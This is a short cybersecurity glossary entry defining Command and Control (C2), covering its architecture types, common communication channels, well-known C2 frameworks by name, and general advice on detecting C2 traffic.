anavem.
Back to Glossary
C

C2 (Command and Control)

Infrastructure and communications channels used by attackers to maintain contact with and control compromised systems.

What is C2?

Command and Control (C2, C&C) refers to the infrastructure, protocols, and techniques attackers use to communicate with and control compromised systems. C2 enables attackers to issue commands, exfiltrate data, and maintain persistent access.

C2 Architecture Types

Centralized:

  • Single server controlling all infected hosts
  • Simple but single point of failure
  • Easier to detect and take down

Peer-to-Peer (P2P):

  • Infected hosts communicate with each other
  • Resilient to takedowns
  • Complex to manage

Hybrid:

  • Combination of approaches
  • Balances resilience and manageability

C2 Communication Methods

  • HTTP/HTTPS: Blends with web traffic
  • DNS: Tunneling data through DNS queries
  • Social Media: Using platforms as dead drops
  • Cloud Services: Legitimate services for C2
  • Custom Protocols: Encrypted proprietary channels

C2 Frameworks

  • Cobalt Strike (commercial)
  • Metasploit (open source)
  • Empire (open source)
  • Sliver (open source)
  • Covenant (open source)

Detecting C2

  • Monitor for beaconing patterns
  • Analyze DNS query anomalies
  • Inspect encrypted traffic metadata
  • Watch for unusual outbound connections
  • Deploy network detection tools